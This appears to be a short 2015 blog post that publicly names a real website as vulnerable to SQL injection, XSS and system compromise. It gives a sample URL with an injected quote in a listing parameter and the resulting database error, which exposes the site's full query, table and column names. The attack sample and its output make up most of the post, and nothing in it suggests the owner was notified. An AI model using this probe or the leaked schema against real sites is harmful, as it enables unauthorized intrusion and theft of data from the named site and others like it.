Skip to main content

Posts

Showing posts from July, 2015

http://www.lcsoftware.com/ | sql injection, xss, system compromise

sample:

http://www.lcsoftware.com/lcss-modules/listings/PublicListingController.php?Action=def&id=11%277&statusFilter=40&pageSize=5&pos=0

error:
Failed to execute query:
select listing_id, TITLE, ADDRESS, CITY, ZIP, STATE, PRICE, DESCRIPTION, TYPE_ID, BEDS, BATHS, FLOORS, SQUARE_FEET, LOT_SIZE, GARAGE_SIZE, YEAR_BUILD, ANNUAL_PROPERTY_TAX, STATUS_ID, HOME_FEATURES, COMMUNITY_FEATURES, MLS, USER_ID, CREATED, RANK, IS_FEATURE_LISTING from LCSS_LISTING WHERE USER_ID='11'7' ORDER BY STATUS_ID, PRICE ASC LIMIT 0, 5